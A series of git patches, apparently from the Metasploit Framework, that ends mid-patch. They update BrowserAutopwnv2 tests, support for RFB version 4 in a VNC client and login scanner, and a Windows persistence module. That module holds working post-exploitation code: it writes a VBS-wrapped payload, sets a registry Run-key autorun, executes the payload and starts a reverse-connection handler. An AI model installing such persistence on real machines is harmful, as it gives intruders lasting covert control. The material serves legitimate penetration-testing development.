@@ -25,7 +25,17 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     allow(subject).to receive(:framework).and_return(framework)
   end
 
-  def create_fake_note(tag, data)
+
+  def mock_report_note(arg)
+    framework = double('Msf::Framework', datastore: {})
+    notes = [create_fake_note('bap.clicks')]
+    db = double('db')
+    allow(db).to receive(:notes).and_return(notes)
+    allow(framework).to receive(:db).and_return(db)
+    allow(subject).to receive(:framework).and_return(framework)
+  end
+
+  def create_fake_note(tag, data='')
     note = double('note')
 
     allow(note).to receive(:ntype).and_return(tag)
@@ -53,6 +63,8 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     disclosure_date   = opts[:disclosure_date] || 'Dec 21 2014'
     compat_payloads   = opts[:compat_payloads] || []
     datastore_options = opts[:datastore_options] || {}
+    job_id            = opts[:job_id] || 0
+    requirements      = opts[:requirements] || {}
 
     mod = Msf::Exploit.new
     mod.extend(Msf::Exploit::Remote::BrowserExploitServer)
@@ -62,66 +74,104 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     allow(mod).to receive(:disclosure_date).and_return(disclosure_date)
     allow(mod).to receive(:compatible_payloads).and_return(compat_payloads)
     allow(mod).to receive(:datastore).and_return(datastore_options)
+    allow(mod).to receive(:job_id).and_return(job_id)
+    allow(mod).to receive(:exploit_simple)
 
     mod
   end
 
   def create_fake_ms14_064
-    compat_payloads = ['windows/meterpreter/reverse_tcp']
+    compat_payloads = [
+      [windows_meterpreter_reverse_tcp, create_fake_windows_meterpreter]
+    ]
 
     create_fake_exploit(
       full_name: 'windows/browser/ms14_064_ole_code_execution',
       rank: 600,
       disclosure_date: 'Nov 13 2014',
       compat_payloads: compat_payloads,
-      datastore_options: {'URI'=>'/ms14_064'}
+      datastore_options: {'URI'=>'/ms14_064'},
+      job_id: 0,
+      requirements: {os_name: windows_81_regex}
     )
   end
 
   def create_fake_flash_net_connection_confusion
-    compat_payloads = ['windows/meterpreter/reverse_tcp', 'linux/x86/meterpreter/reverse_tcp']
+    compat_payloads = [
+      [windows_meterpreter_reverse_tcp, create_fake_windows_meterpreter],
+      [linux_meterpreter_reverse_tcp, create_fake_linux_meterpreter]
+    ]
 
     create_fake_exploit(
       full_name: 'multi/browser/adobe_flash_net_connection_confusion',
       rank: 500,
       disclosure_date: 'Mar 12 2015',
       compat_payloads: compat_payloads,
-      datastore_options: {'URI'=>'/flash1'}
+      datastore_options: {'URI'=>'/flash1'},
+      job_id: 1,
+      requirements: {os_name: windows_81_regex}
     )
   end
 
   def create_fake_flash_uncompress_zlib_uaf
-    compat_payloads = ['windows/meterpreter/reverse_tcp', 'linux/x86/meterpreter/reverse_tcp']
+    compat_payloads = [windows_meterpreter_reverse_tcp, linux_meterpreter_reverse_tcp]
 
     create_fake_exploit(
       full_name: 'multi/browser/adobe_flash_uncompress_zlib_uaf',
       rank: 500,
       disclosure_date: 'Apr 28 2014',
       compat_payloads: compat_payloads,
-      datastore_options: {'URI'=>'/flash2'}
+      datastore_options: {'URI'=>'/flash2'},
+      job_id: 2,
+      requirements: {os_name: windows_81_regex}
     )
   end
 
-  def create_fake_windows_meterpreter
+  def create_fake_payload(opts={})
+    platforms  = opts[:platforms]
+    archs      = opts[:archs]
+    datastores = opts[:datastore_options]
+    fullname   = opts[:fullname]
+    shortname  = opts[:shortname]
+
     p = Msf::Payload.new
-    p.platform.platforms << Msf::Module::Platform::Windows
-    p.arch << 'x86'
-    p.datastore['LPORT'] = '4444'
-    allow(p).to receive(:fullname).and_return('windows/meterpreter/reverse_tcp')
-    allow(p).to receive(:shortname).and_return('reverse_tcp')
+
+    platforms.each do |platform|
+      p.platform.platforms << platform
+    end
+
+    archs.each do |arch|
+      p.arch << arch
+    end
+
+    datastores.each_pair do |key, value|
+      p.datastore[key] = value
+    end
+
+    allow(p).to receive(:fullname).and_return(fullname)
+    allow(p).to receive(:shoftname).and_return(shortname)
 
     p
   end
 
-  def create_fake_linux_meterpreter
-    p = Msf::Payload.new
-    p.platform.platforms << Msf::Module::Platform::Linux
-    p.arch << 'x86'
-    p.datastore['LPORT'] = '4445'
-    allow(p).to receive(:fullname).and_return('linux/x86/meterpreter/reverse_tcp')
-    allow(p).to receive(:shortname).and_return('reverse_tcp')
+  def create_fake_windows_meterpreter
+    create_fake_payload(
+      platforms: [Msf::Module::Platform::Windows],
+      archs: ['x86'],
+      datastore_options: {'LPORT'=>'4444'},
+      fullname: windows_meterpreter_reverse_tcp,
+      shortname: 'reverse_tcp'
+    )
+  end
 
-    p
+  def create_fake_linux_meterpreter
+    create_fake_payload(
+      platforms: [Msf::Module::Platform::Linux],
+      archs: ['x86'],
+      datastore_options: {'LPORT'=>'4445'},
+      fullname: linux_meterpreter_reverse_tcp,
+      shortname: 'reverse_tcp'
+    )
   end
 
   def mock_payload_create(full_name)
@@ -140,6 +190,18 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     nil
   end
 
+  let(:windows_meterpreter_reverse_tcp) do
+    'windows/meterpreter/reverse_tcp'
+  end
+
+  let(:linux_meterpreter_reverse_tcp) do
+    'linux/x86/meterpreter/reverse_tcp'
+  end
+
+  let(:windows_81_regex) do
+    /^(?:Microsoft )?Windows 8\.1/
+  end
+
   let(:available_exploits) do
     @exploits ||= lambda {
       exploits = []
@@ -178,7 +240,9 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
       'SRVHOST'               => '0.0.0.0',
       'SRVPORT'               => 8080,
       'MaxExploits'           => 20,
+      'LHOST'                 => '127.0.0.1',
       'MaxSessions'           => -1,
+      'Custom404'             => 'http://example.com',
       'PAYLOAD_ANDROID'       => 'android/meterpreter/reverse_tcp',
       'PAYLOAD_FIREFOX'       => 'firefox/shell_reverse_tcp',
       'PAYLOAD_GENERIC'       => 'generic/shell_reverse_tcp',
@@ -237,7 +301,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
 
     # Prepare framework.db
     db = double('db')
-    allow(db).to receive(:report_note).with(kind_of(Hash)) { mock_report_note }
+    allow(db).to receive(:report_note).with(kind_of(Hash)) { |arg| mock_report_note(arg) }
     allow(db).to receive(:notes).and_return(notes)
     allow(db).to receive(:active).and_return(true)
     allow(framework).to receive(:db).and_return(db)
@@ -262,6 +326,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     allow(framework).to receive(:payloads).and_return(payloads)
 
     allow_any_instance_of(described_class).to receive(:framework).and_return(framework)
+    allow_any_instance_of(described_class).to receive(:report_note) { |arg| mock_report_note(arg) }
   end
 
   subject do
@@ -351,7 +416,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
   describe '#set_exploit_options' do
     before(:each) do
       payload_info = {
-        payload_name: 'windows/meterpreter/reverse_tcp',
+        payload_name: windows_meterpreter_reverse_tcp,
         payload_lport: 4444
       }
 
@@ -463,36 +528,137 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
   describe '#get_selected_payload_name' do
     context 'when windows platform is given' do
       it 'returns windows/meterpreter/reverse_tcp' do
-        expect(subject.get_selected_payload_name('win')).to eq('windows/meterpreter/reverse_tcp')
+        expect(subject.get_selected_payload_name('win')).to eq(windows_meterpreter_reverse_tcp)
       end
     end
   end
 
   describe '#get_selected_payload_lport' do
+    context 'when windows platform is given' do
+      it 'returns 4444' do
+        expect(subject.get_selected_payload_lport('win')).to eq(4444)
+      end
+    end
   end
 
   describe '#get_payload_lhost' do
+    it 'returns LHOST' do
+      expect(subject.get_payload_lhost).to eq(autopwn_datastore_options['LHOST'])
+    end
   end
 
   describe '#start_payload_listeners' do
   end
 
   describe '#parse_rank' do
+    context 'when rank is 600' do
+      it 'returns Excellent' do
+        expect(subject.parse_rank(600)).to eq('Excellent')
+      end
+    end
+
+    context 'when rank is 500' do
+      it 'returns Great' do
+        expect(subject.parse_rank(500)).to eq('Great')
+      end
+    end
+
+    context 'when rank is 400' do
+      it 'returns Good' do
+        expect(subject.parse_rank(400)).to eq('Good')
+      end
+    end
+
+    context 'when rank is 300' do
+      it 'returns Good' do
+        expect(subject.parse_rank(300)).to eq('Normal')
+      end
+    end
+
+    context 'when rank is 200' do
+      it 'returns Average' do
+        expect(subject.parse_rank(200)).to eq('Average')
+      end
+    end
+
+    context 'when rank is 100' do
+      it 'returns Low' do
+        expect(subject.parse_rank(100)).to eq('Low')
+      end
+    end
+
+    context 'when rank is 0' do
+      it 'returns Manual' do
+        expect(subject.parse_rank(0)).to eq('Manual')
+      end
+    end
   end
 
   describe '#is_payload_platform_compatible?' do
+    let(:windows_payload) { create_fake_windows_meterpreter }
+
+    context 'when a valid platform is given' do
+      it 'returns true' do
+        expect(subject.is_payload_platform_compatible?(windows_payload, 'win')).to be_truthy
+      end
+    end
+
+    context 'when an invalid platform is given' do
+      it 'returns false' do
+        expect(subject.is_payload_platform_compatible?(windows_payload, 'linux')).to be_falsey
+      end
+    end
   end
 
   describe '#is_payload_compatible?' do
+    let(:windows_exploit) { create_fake_ms14_064 }
+
+    context 'when a valid payload name is given' do
+      it 'returns true' do
+        expect(subject.is_payload_compatible?(windows_exploit, windows_meterpreter_reverse_tcp)).to be_truthy
+      end
+    end
+
+    context 'when an invalid payload name is given' do
+      it 'returns false' do
+        expect(subject.is_payload_compatible?(windows_exploit, linux_meterpreter_reverse_tcp)).to be_falsey
+      end
+    end
   end
 
   describe '#is_multi_platform_exploit?' do
+    context 'when a windows exploit is given' do
+      it 'returns false' do
+        windows_exploit = create_fake_ms14_064
+        expect(subject.is_multi_platform_exploit?(windows_exploit)).to be_falsey
+      end
+    end
+
+    context 'when a multi-platform flash exploit is given' do
+      it 'returns true' do
+        flash_exploit = create_fake_flash_net_connection_confusion
+        expect(subject.is_multi_platform_exploit?(flash_exploit)).to be_truthy
+      end
+    end
   end
 
   describe '#select_payload' do
   end
 
   describe '#start_exploits' do
+    before(:each) do
+      allow(subject).to receive(:set_exploit_options)
+      subject.instance_variable_set(:@exploit_job_ids, [])
+      subject.instance_variable_set(:@bap_exploits, [])
+      subject.init_exploits
+    end
+
+    it 'returns job IDs of the exploits started' do
+      subject.start_exploits
+      available_exploits.each do |x|
+        expect(subject.instance_variable_get(:@exploit_job_ids)).to include(x.job_id)
+      end
+    end
   end
 
   describe '#show_ready_exploits' do
@@ -508,9 +674,24 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
   end
 
   describe '#get_suitable_exploits' do
+    before(:each) do
+      allow(subject).to receive(:set_exploit_options)
+      subject.instance_variable_set(:@bap_exploits, [])
+      subject.init_exploits
+      allow(subject).to receive(:retrieve_tag)
+      allow(subject).to receive(:get_profile_info)
+    end
   end
 
   describe '#log_click' do
+    let(:ip) { '192.168.1.123' }
+
+    context 'when a link is clicked' do
+      it 'reports a bap.clicks note' do
+        subject.log_click(ip)
+        expect(subject.framework.db.notes.first.ntype).to eq('bap.clicks')
+      end
+    end
   end
 
   describe '#show_real_list' do
@@ -529,6 +710,9 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
   end
 
   describe '#get_custom_404_url' do
+    it 'returns a custom 404' do
+      expect(subject.get_custom_404_url).to eq(autopwn_datastore_options['Custom404'])
+    end
   end
 
   describe '#build_html' do

From a3debe16212ee9274109105fe995185225c134aa Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Wed, 17 Jun 2015 13:57:06 +0100
Subject: [PATCH 0436/1013] persistence - more options, more verbose

...and less bugs!

+ Able to define the EXE payload filename
+ Able to setup a handler job
+ Able to execute persistence payload after installing
+ Performs various checks (should be more stable now)
+ Will display various warnings if your doing something 'different'
+ Added various verbose messages during the process
---
 modules/exploits/windows/local/persistence.rb | 328 +++++++++++++-----
 1 file changed, 236 insertions(+), 92 deletions(-)

diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb
index bd04998af2..5747da35d4 100644
--- a/modules/exploits/windows/local/persistence.rb
+++ b/modules/exploits/windows/local/persistence.rb
@@ -22,12 +22,11 @@ class Metasploit3 < Msf::Exploit::Local
 
   def initialize(info={})
     super( update_info( info,
-      'Name'          => 'Windows Manage Persistent Payload Installer',
+      'Name'          => 'Windows Persistent Registry Startup Payload Installer',
       'Description'   => %q{
-        This Module will create a boot persistent reverse Meterpreter session by
-        installing on the target host the payload as a script that will be executed
-        at user logon or system startup depending on privilege and selected startup
-        method.
+        This module will install a payload that is executed during boot.
+        It will be executed either at user logon or system startup via the registry
+        value in "CurrentVersion\Run" (depending on privilege and selected method).
       },
       'License'       => MSF_LICENSE,
       'Author'        =>
@@ -38,50 +37,117 @@ class Metasploit3 < Msf::Exploit::Local
       'SessionTypes'  => [ 'meterpreter' ],
       'Targets'       => [ [ 'Windows', {} ] ],
       'DefaultTarget' => 0,
-      'DisclosureDate'=> "Oct 19 2011"
+      'DisclosureDate'=> "Oct 19 2011",
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'true',
+        }
     ))
 
     register_options(
       [
-        OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]),
-        OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
-        OptString.new('REXENAME',[false, 'The name to call payload on remote system.', nil]),
-        OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']),
-        OptString.new('PATH',[false, 'Path to write payload']),
+        OptInt.new('DELAY',
+          [true, 'Delay (in seconds) for persistent payload to keep reconnecting back.', 10]),
+        OptEnum.new('STARTUP',
+          [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
+        OptString.new('VBS_NAME',
+          [false, 'The filename to use for the VBS persistent script on the target host (%RAND% by default).', nil]),
+        OptString.new('EXE_NAME',
+          [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
+        OptString.new('REG_NAME',
+          [false, 'The name to call registry value for persistence on target host (%RAND% by default).', nil]),
+        OptString.new('PATH',
+          [false, 'Path to write payload (%TEMP% by default).', nil]),
+      ], self.class)
+
+    register_advanced_options([
+      OptBool.new('HANDLER',
+        [ false, 'Start an exploit/multi/handler job to receive the connection', false]),
+      OptBool.new('EXEC_AFTER',
+        [ false, 'Execute persistent script after installing.', false])
       ], self.class)
   end
 
-  # Exploit Method for when exploit command is issued
+  # Exploit method for when exploit command is issued
   def exploit
-    print_status("Running module against #{sysinfo['Computer']}")
+    print_status("Running persistent module against #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
 
-    rexename = datastore['REXENAME']
-    delay = datastore['DELAY']
-    reg_val = datastore['REG_NAME']
+    # Define default values
+    rvbs_name = datastore['VBS_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    rexe_name = datastore['EXE_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    reg_val   = datastore['REG_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    delay = datastore['DELAY'] || 10
+    exc_after = datastore['EXEC_AFTER'] || false
+    handler = datastore['HANDLER'] || false
     @clean_up_rc = ""
-    host,port = session.session_host, session.session_port
 
-    exe = generate_payload_exe
-    script = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay})
-    script_on_target = write_script_to_target(script, rexename)
+    rvbs_name = rvbs_name + '.vbs' if rvbs_name[-4,4] != '.vbs'
+    rexe_name = rexe_name + '.exe' if rexe_name[-4,4] != '.exe'
 
-    # exit the module because we failed to write the file on the target host.
-    return unless script_on_target
-
-    # Initial execution of script
-
-    case datastore['STARTUP']
-    when 'USER'
-      # if we could not write the entry in the registy we exit the module.
-      return unless write_to_reg("HKCU", script_on_target, reg_val)
-    when 'SYSTEM'
-      # if we could not write the entry in the registy we exit the module.
-      return unless write_to_reg("HKLM", script_on_target, reg_val)
+    # Connect to the session
+    begin
+      host, port = session.session_host, session.session_port
+    rescue => e
+      print_error("Could not connect to session")
+      return nil
     end
 
+    # Check values
+    if (is_system?) && (datastore['STARTUP'] == 'USER')
+      print_warning('Note: Current user is SYSTEM & STARTUP == USER. This user may not login often!')
+    end
+
+    if (handler) && (!datastore['DisablePayloadHandler'])
+      # DisablePayloadHandler will stop listening after the script finishes - we want a job so it continues afterwards!
+      print_warning("Note: HANDLER == TRUE && DisablePayloadHandler == TRUE. This will create issues...")
+      print_warning("Disabling HANDLER...")
+      handler = false
+    end
+
+    # Generate the exe payload
+    print_status("Generating EXE payload (#{rexe_name})") if datastore['VERBOSE']
+    exe = generate_payload_exe
+    # Generate the vbs payload
+    print_status("Generating VBS persistent script (#{rvbs_name})") if datastore['VERBOSE']
+    vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay, :exe_filename => rexe_name})
+    # Writing the payload to target
+    print_status("Writing payload inside the VBS script on the target") if datastore['VERBOSE']
+    script_on_target = write_script_to_target(vbsscript, rvbs_name)
+
+    # Exit the module because we failed to write the file on the target host
+    # Feedback has already been given to the user, via the function.
+    return unless script_on_target
+
+    # Initial execution of persistent script
+    case datastore['STARTUP']
+    when 'USER'
+      # If we could not write the entry in the registy we exit the module.
+      return unless write_to_reg("HKCU", script_on_target, reg_val)
+      print_status("Payload will execute when USER (#{session.sys.config.getuid}) next logs on") if datastore['VERBOSE']
+    when 'SYSTEM'
+      # If we could not write the entry in the registy we exit the module.
+      return unless write_to_reg("HKLM", script_on_target, reg_val)
+      print_status("Payload will execute at the next SYSTEM startup") if datastore['VERBOSE']
+    else
+      print_error("Something went wrong. Invalid STARTUP method: #{datastore['STARTUP']}")
+      return nil
+    end
+
+    # Do we setup a exploit/multi/handler job?
+    if handler
+      listener_job_id = create_multihandler(datastore['LHOST'], datastore['LPORT'], datastore['PAYLOAD'])
+      if listener_job_id.blank?
+        print_error("Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
+      end
+    end
+
+    # Do we execute the VBS script afterwards?
+    target_exec(script_on_target) if datastore['EXEC_AFTER']
+
+    # Create 'clean up' resource file
     clean_rc = log_file()
     file_local_write(clean_rc, @clean_up_rc)
-    print_status("Cleanup Meterpreter RC File: #{clean_rc}")
+    print_status("Clean up Meterpreter .RC file: #{clean_rc}")
 
     report_note(:host => host,
       :type => "host.persistance.cleanup",
@@ -98,9 +164,144 @@ class Metasploit3 < Msf::Exploit::Local
     )
   end
 
+  # Writes script to target host and returns the pathname of the target file or nil if the
+  # file could not be written.
+  def write_script_to_target(vbs, name)
+    filename = name || Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
+    temppath = datastore['PATH'] || session.sys.config.getenv('TEMP')
+    filepath = temppath + "\\" + filename
+
+    if !directory? temppath
+      print_error("#{temppath} does not exists on the target")
+      return nil
+    end
+
+    if file? filepath
+      print_warning("#{filepath} already exists on the target. Deleting...")
+      begin
+        file_rm(filepath)
+        print_good("Deleted #{filepath}")
+      rescue
+        print_error("Unable to delete file!")
+      end
+    end
+
+    begin
+      write_file(filepath, vbs)
+      print_good("Persistent VBS script written on #{sysinfo['Computer']} to #{filepath}")
+
+      # Escape windows pathname separators.
+      @clean_up_rc << "rm #{filepath.gsub(/\\/, '//')}\n"
+    rescue
+      print_error("Could not write the payload on the target")
+      # Return nil since we could not write the file on the target
+      filepath = nil
+    end
+
+    return filepath
+  end
+
+  # Installs payload in to the registry HKLM or HKCU
+  def write_to_reg(key, script_on_target, registry_value)
+    regsuccess = true
+    nam = registry_value || Rex::Text.rand_text_alpha(rand(8)+8)
+    key_path = "#{key.to_s}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
+
+    print_status("Installing as #{key_path}\\#{nam}")
+
+    if key && registry_setvaldata(key_path, nam, script_on_target, "REG_SZ")
+      print_good("Installed autorun on #{sysinfo['Computer']} as #{key_path}\\#{nam}")
+    else
+      print_error("Failed to make entry in the registry for persistence")
+      regsuccess = false
+    end
+
+    return regsuccess
+  end
+
+
+  # Executes script on target and returns true if it was successfully started
+  def target_exec(script_on_target)
+    execsuccess = true
+    print_status("Executing script #{script_on_target}")
+    # Lets give the target a few seconds to catch up...
+    sleep(3)
+
+    # Error handling for process.execute() can throw a RequestError in send_request.
+    begin
+      unless datastore['EXE::Custom']
+        session.shell_command_token(script_on_target)
+      else
+        session.shell_command_token("cscript \"#{script_on_target}\"")
+      end
+    rescue
+      print_error("Failed to execute payload on target")
+      execsuccess = false
+    end
+
+    return execsuccess
+  end
+
+  # Starts a exploit/multi/handler session
+  def create_multihandler(lhost, lport, payload_name)
+    pay = client.framework.payloads.create(payload_name)
+    pay.datastore['LHOST'] = lhost
+    pay.datastore['LPORT'] = lport
+    print_status('Starting exploit/multi/handler')
+    if !check_for_listener(lhost, lport)
+      # Set options for module
+      mh = client.framework.exploits.create('multi/handler')
+      mh.share_datastore(pay.datastore)
+      mh.datastore['WORKSPACE'] = client.workspace
+      mh.datastore['PAYLOAD'] = payload_name
+      mh.datastore['EXITFUNC'] = 'thread'
+      mh.datastore['ExitOnSession'] = true
+      # Validate module options
+      mh.options.validate(mh.datastore)
+      # Execute showing output
+      mh.exploit_simple(
+          'Payload'     => mh.datastore['PAYLOAD'],
+          'LocalInput'  => self.user_input,
+          'LocalOutput' => self.user_output,
+          'RunAsJob'    => true
+        )
+
+      # Check to make sure that the handler is actually valid
+      # If another process has the port open, then the handler will fail
+      # but it takes a few seconds to do so.  The module needs to give
+      # the handler time to fail or the resulting connections from the
+      # target could end up on on a different handler with the wrong payload
+      # or dropped entirely.
+      select(nil, nil, nil, 5)
+      return nil if framework.jobs[mh.job_id.to_s].nil?
+
+      return mh.job_id.to_s
+    else
+      print_error('A job is listening on the same local port')
+      return nil
+    end
+  end
+
+  # Method for checking if a listener for a given IP and port is present
+  # will return true if a conflict exists and false if none is found
+  def check_for_listener(lhost, lport)
+    client.framework.jobs.each do |k, j|
+      if j.name =~ / multi\/handler/
+        current_id = j.jid
+        current_lhost = j.ctx[0].datastore['LHOST']
+        current_lport = j.ctx[0].datastore['LPORT']
+        if lhost == current_lhost && lport == current_lport.to_i
+          print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")
+          return true
+        end
+      end
+    end
+    return false
+  end
+
   # Function for creating log folder and returning log path
   def log_file(log_path = nil)
-    #Get hostname
+    # Get hostname
     host = session.sys.config.sysinfo["Computer"]
 
     # Create Filename info to be appended to downloaded files
@@ -118,66 +319,9 @@ class Metasploit3 < Msf::Exploit::Local
     # Create the log directory
     ::FileUtils.mkdir_p(logs)
 
-    #logfile name
+    # logfile name
     logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
     return logfile
   end
 
-  # Writes script to target host and returns the pathname of the target file or nil if the
-  # file could not be written.
-  def write_script_to_target(vbs, name)
-    tempdir = datastore['PATH'] || session.sys.config.getenv('TEMP')
-    unless name
-      tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
-    else
-      tempvbs = tempdir + "\\" + name + ".vbs"
-    end
-    begin
-      write_file(tempvbs, vbs)
-      print_good("Persistent Script written to #{tempvbs}")
-      # Escape windows pathname separators.
-      @clean_up_rc << "rm #{tempvbs.gsub(/\\/, '//')}\n"
-    rescue
-      print_error("Could not write the payload on the target hosts.")
-      # return nil since we could not write the file on the target host.
-      tempvbs = nil
-    end
-    return tempvbs
-  end
-
-  # Executes script on target and returns true if it was successfully started
-  def target_exec(script_on_target)
-    execsuccess = true
-    print_status("Executing script #{script_on_target}")
-    # error handling for process.execute() can throw a RequestError in send_request.
-    begin
-      unless datastore['EXE::Custom']
-        session.shell_command_token(script_on_target)
-      else
-        session.shell_command_token("cscript \"#{script_on_target}\"")
-      end
-    rescue
-      print_error("Failed to execute payload on target host.")
-      execsuccess = false
-    end
-    return execsuccess
-  end
-
-  # Installs payload in to the registry HKLM or HKCU
-  def write_to_reg(key, script_on_target, registry_value)
-    nam = registry_value || Rex::Text.rand_text_alpha(rand(8)+8)
-    key_path = "#{key.to_s}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
-
-    print_status("Installing into autorun as #{key_path}\\#{nam}")
-
-    if key && registry_setvaldata(key_path, nam, script_on_target, "REG_SZ")
-      print_good("Installed into autorun as #{key_path}\\#{nam}")
-      return true
-    else
-      print_error("Failed to make entry in the registry for persistence.")
-    end
-
-    false
-  end
-
 end

From 772a5dd7dfd878c7dc36b1203db69f5bcab4ce11 Mon Sep 17 00:00:00 2001
From: Th3R3p0 <th3r3p0@gmail.com>
Date: Wed, 17 Jun 2015 12:31:51 -0400
Subject: [PATCH 0437/1013] Created array and added support for version 4

---
 lib/rex/proto/rfb/constants.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/lib/rex/proto/rfb/constants.rb b/lib/rex/proto/rfb/constants.rb
index 51bc88ec0b..4f01ee24a2 100644
--- a/lib/rex/proto/rfb/constants.rb
+++ b/lib/rex/proto/rfb/constants.rb
@@ -19,7 +19,9 @@ module RFB
 DefaultPort = 5900
 
 # Version information
-MajorVersion = 3
+# Created array and added support for version 4. aux/scanner/vnc/vnc_login
+#   was confirmed to work with version 004.001
+MajorVersions = [3,4]
 # NOTE: We will emulate whatever minor version the server reports.
 
 # Security types

From e30b0e0cda3e8edb65a04b57d7fa0998126f76f7 Mon Sep 17 00:00:00 2001
From: Th3R3p0 <th3r3p0@gmail.com>
Date: Wed, 17 Jun 2015 12:57:24 -0400
Subject: [PATCH 0438/1013] forced client to version 3 for servers and added
 comments. This adds support for RFB version 4 servers. Tested on 004.001

---
 lib/rex/proto/rfb/client.rb | 15 +++++++++++----
 1 file changed, 11 insertions(+), 4 deletions(-)

diff --git a/lib/rex/proto/rfb/client.rb b/lib/rex/proto/rfb/client.rb
index b80247db8d..7aa2c8671f 100644
--- a/lib/rex/proto/rfb/client.rb
+++ b/lib/rex/proto/rfb/client.rb
@@ -24,7 +24,7 @@ class Client
     @opts = opts
 
     @banner = nil
-    @majver = MajorVersion
+    @majver = MajorVersions
     @minver = -1
     @auth_types = []
   end
@@ -50,7 +50,7 @@ class Client
 
     if @banner =~ /RFB ([0-9]{3})\.([0-9]{3})/
       maj = $1.to_i
-      if maj != MajorVersion
+      unless MajorVersions.include?(maj)
         @error = "Invalid major version number: #{maj}"
         return false
       end
@@ -61,8 +61,15 @@ class Client
 
     @minver = $2.to_i
 
-    our_ver = "RFB %03d.%03d\n" % [MajorVersion, @minver]
-    @sock.put(our_ver)
+		# Forces client version 3 to be used. This adds support
+		# 	version 4 servers.
+		# It may be necessary to hardcode a miniver as well
+		# to do: add support for Version 4. Version 4 client
+		#   adds additional information to the packet regarding
+		#		supported authentication types.
+    our_ver = "RFB %03d.%03d\n" % [3, @minver]
+    puts our_ver
+		@sock.put(our_ver)
 
     true
   end

From a6c7f93bbeb4794580c84955f65c10139ddebd54 Mon Sep 17 00:00:00 2001
From: Th3R3p0 <th3r3p0@gmail.com>
Date: Wed, 17 Jun 2015 13:09:03 -0400
Subject: [PATCH 0439/1013] changed text to show support for RFB version 4.001

---
 modules/auxiliary/scanner/vnc/vnc_login.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb
index 7e5f1af773..840fed4561 100644
--- a/modules/auxiliary/scanner/vnc/vnc_login.rb
+++ b/modules/auxiliary/scanner/vnc/vnc_login.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
       'Description' => %q{
           This module will test a VNC server on a range of machines and
         report successful logins. Currently it supports RFB protocol
-        version 3.3, 3.7, and 3.8 using the VNC challenge response
+        version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response
         authentication method.
       },
       'Author'      =>

From 8ea09532c835c945c0c9186eff3b0ef0427122a6 Mon Sep 17 00:00:00 2001
From: Th3R3p0 <th3r3p0@gmail.com>
Date: Wed, 17 Jun 2015 13:13:00 -0400
Subject: [PATCH 0440/1013] removed a debugging line

---
 lib/rex/proto/rfb/client.rb | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/lib/rex/proto/rfb/client.rb b/lib/rex/proto/rfb/client.rb
index 7aa2c8671f..44251aaf55 100644
--- a/lib/rex/proto/rfb/client.rb
+++ b/lib/rex/proto/rfb/client.rb
@@ -62,14 +62,13 @@ class Client
     @minver = $2.to_i
 
 		# Forces client version 3 to be used. This adds support
-		# 	version 4 servers.
+		# 	for version 4 servers.
 		# It may be necessary to hardcode a miniver as well
 		# to do: add support for Version 4. Version 4 client
 		#   adds additional information to the packet regarding
 		#		supported authentication types.
     our_ver = "RFB %03d.%03d\n" % [3, @minver]
-    puts our_ver
-		@sock.put(our_ver)
+    @sock.put(our_ver)
 
     true
   end

From 5fa864b09776cb888741c69a1977a5deee249617 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 17 Jun 2015 16:23:39 -0500
Subject: [PATCH 0441/1013] done with rspec

---
 lib/msf/core/exploit/browser_autopwnv2.rb     |   4 +-
 .../core/exploit/browser_autopwnv2_spec.rb    | 212 +++++++++++++++---
 2 files changed, 178 insertions(+), 38 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 866e78d6e1..6363c3e759 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -182,7 +182,7 @@ module Msf
       taken = false
 
       bap_exploits.each do |m|
-        return true if m.datastore['URI'] == resource
+        return true if m.datastore['URIPATH'] == resource
       end
 
       taken
@@ -558,9 +558,9 @@ module Msf
       DEFAULT_PAYLOADS.keys.each do |platform|
         payload_name = get_selected_payload_name(platform)
         p = framework.payloads.create(payload_name)
